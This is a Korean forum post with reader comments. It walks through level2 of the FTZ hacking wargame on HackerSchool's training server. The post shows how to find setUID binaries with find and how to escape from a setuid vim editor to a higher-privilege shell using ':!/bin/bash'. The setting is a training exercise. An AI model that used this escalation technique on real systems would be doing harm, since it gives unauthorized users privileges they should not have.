1581,

1/80

결빙

해쿨 level2 강의

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1229 [복사]

안녕하세용... 이번에 처음 글을 올리는 "결빙"입니다...
트레이너를 수료해도 level해킹을 전혀 할줄 모르겠다!
그럼 이 글을 보세용 ㅎㅎ
=========================================================

login as: level2
level2@ftz.hackerschool.org's password:비번은 아시겠죠? ㅎㅎ

[level2@ftz level2]$ ls -l
total 16
-rw-r--r--    1 root     root           60 Mar 23  2000 hint
drwxr-xr-x    2 root     level2       4096 Feb 24  2002 public_html
drwxrwxr-x    2 root     level2       8192 Jul  5 21:31 tmp

#일단 hint 파일이 있는지 살펴봅니다....
#hint 파일이 있네요! 그러면 힌트를 봐 봅시다!

[level2@ftz level2]$ cat hint

텍스트 파일 편집중 쉘의 명령을 실행시킬 수 있다는데...

#힌트를 봅시다... 텍스트 파일 편집중에 쉘의 명령을 실행시킬수 있다죠?
#그럼 setUID 파일이 있는지 find 명령어로 찾아봅시다...

[level2@ftz level2]$ find / -perm -4000 -user level3 2> /dev/null

#자... 하나 나왔네요...

/usr/bin/editor

#에디터라....한번 실행해 봅시다....

[level2@ftz level2]$ /usr/bin/editor

#자!이제 VIM이 나옵니다... VIM은
#리눅스 대표텍스트 에디터인데요...
#우리는 이렇게 생각합시다.. 윈도우즈엔 메모장이 있다면!
#리눅스에는 VIM이 있다!!
#VI창을 봅시다...

~
~
~
~
~
~                              VIM - Vi IMproved
~
~                               version 6.1.320
~                           by Bram Moolenaar et al.
~                 Vim is open source and freely distributable
~
~                        Help poor children in Uganda!
~                type  :help iccf<Enter>       for information
~
~                type  :q<Enter>               to exit
~                type  :help<Enter>  or  <F1>  for on-line help
~                type  :help version6<Enter>   for version info
~
~
~
~
~

#이렇게 되있습니다...

#아까 검색했을때 이 파일엔 setUID가 걸려있었습니다..
#다시말해 이파일을 실행중에는 level3의 권한으로 실행된다는 것이죠...
#봅시다.. VIM사용법중에 텍스트 편집중 파일을 실행할수 있다는걸 아십니까?
#(Esc)를 누르고느낌표(!)를 두번 입력하여줍니다...
#그럼 밑에 ":.!"라고 표시될것입니다...
#그럼 예를 봅시다...

~
~
~
~
~
~                              VIM - Vi IMproved
~
~                               version 6.1.320
~                           by Bram Moolenaar et al.
~                 Vim is open source and freely distributable
~
~                        Help poor children in Uganda!
~                type  :help iccf<Enter>       for information
~
~                type  :q<Enter>               to exit
~                type  :help<Enter>  or  <F1>  for on-line help
~                type  :help version6<Enter>   for version info
~
~
~
~
~
:.!

#↑보이시죠? 자 이제 여기 쉘명령을 입력해 줍시다....

:.!

#하지만 그대로 하면 오류같은게 뜹니다...

shell returned 127

Hit ENTER or type command to continue

#라고 뜹니다.... 자 문제는

:.!

#여기 있습니다... 보세요... 명령어는 !/file 이라했는데

:!

#이렇게 고쳐줍니다.... 그리고 쉘 명령어를 입력합니다....

:!/bin/bash

#또는

:!sh

#그럼 레벨 3의 권한을 얻게됩니다

[level3@ftz level2]$

#이제 뭘해야할지 아시겠죠?
#my-pass명령어로 레벨 3 패스워드를 알아냅니다...

[level3@ftz level2]$ my-pass

#패스워드 창이 뜹니다...

Level3 Password is "************".

[level3@ftz level2]$

#패스워드는 *로 채웠습니다... level2는 비교작 쉬우니
#자기 실력으로 풀어봅시다!

Hit : 11759 Date : 2009/07/07 04:39


sjk1213	니마 이거 비번 입력 할때 따옴표도 입력해야 하나요? 저 그것때문에 지금 몇번을 비번 쳤는데 레벨3에 접속이 안되고 있어요.ㅜ.ㅡ	2009/07/08
결빙	ㄴ ㅎㅎ 비번 입력할때, 큰따옴표입력까지 할 필요는 없답니다^^	2009/07/10
pds7724	ㅎㅎ 이건 답을 다 알려주는 것인디^^	2009/07/23
ssake2002	level1이랑 비슷한듯...? 그래도 어려워~	2009/07/26
결빙	pds님 죄송해요 ㅠㅠ	2009/07/30
hse9422	전 해도 해도 '[level2@ftz level2]$'라고 프롬프트가 바뀌질 않는데...	2009/07/30
hse9422	ㅈㅅ 제가 잘못했던거임.. 실행을 시키는 거였는데 만들고 있었네요.. ㅋㅋ ㅈㅅ	2009/07/30
결빙	ㄴ ㅎㅎㅎㅎ갠차나요 다그럴수 있는거니 ㅎ	2009/08/01
islhoeve	워어어..어렵다..ㅎㅎ	2011/04/04
rlduq1993	/usr/bin/editor을 치면 허가 거부됨이라고 드네요.	2011/11/29